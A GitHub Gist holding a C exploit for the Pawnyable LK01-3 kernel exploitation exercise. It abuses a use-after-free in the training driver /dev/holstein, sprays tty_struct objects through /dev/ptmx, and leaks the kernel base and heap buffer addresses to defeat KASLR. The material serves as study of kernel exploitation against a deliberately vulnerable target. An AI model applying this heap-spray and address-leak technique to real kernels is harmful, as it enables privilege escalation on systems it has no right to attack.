Last active
November 28, 2022 00:55
-
-
Save brant-ruan/509036d8b71a99a1c419b9210add27b0 to your computer and use it in GitHub Desktop.
Pawnyable LK01-3
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <fcntl.h> | |
| #include <stdio.h> | |
| #include <string.h> | |
| #include <sys/stat.h> | |
| #include <sys/types.h> | |
| #include <unistd.h> | |
| #define ofs_tty_ops 0xc39c60 | |
| unsigned long kbase; | |
| unsigned long g_buf; | |
| int main() { | |
| int spray[100]; | |
| int fd1 = open( "/dev/holstein" , O_RDWR); | |
| int fd2 = open( "/dev/holstein" , O_RDWR); | |
| close(fd1); // free(g_buf) | |
| for (int i = 0; i < 100; i++) { | |
| spray[i] = open("/dev/ptmx", O_RDONLY | O_NOCTTY); | |
| if (spray[i] == -1) | |
| perror("open"); | |
| } | |
| char buf[0x400]; | |
| read(fd2, buf, 0x400); // read tty_struct | |
| kbase = *(unsigned long *)&buf[0x18] - ofs_tty_ops; | |
| g_buf = *(unsigned long *)&buf[0x38] - 0x38; | |
| printf("[+] leaked kernel base address: 0x%lx\n", kbase); | |
| printf("[+] leaked g_buf address: 0x%lx\n", g_buf); | |
| getchar(); | |
| for (int i = 0; i < 100; i++) | |
| close(spray[i]); | |
| return 0; | |
| } |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment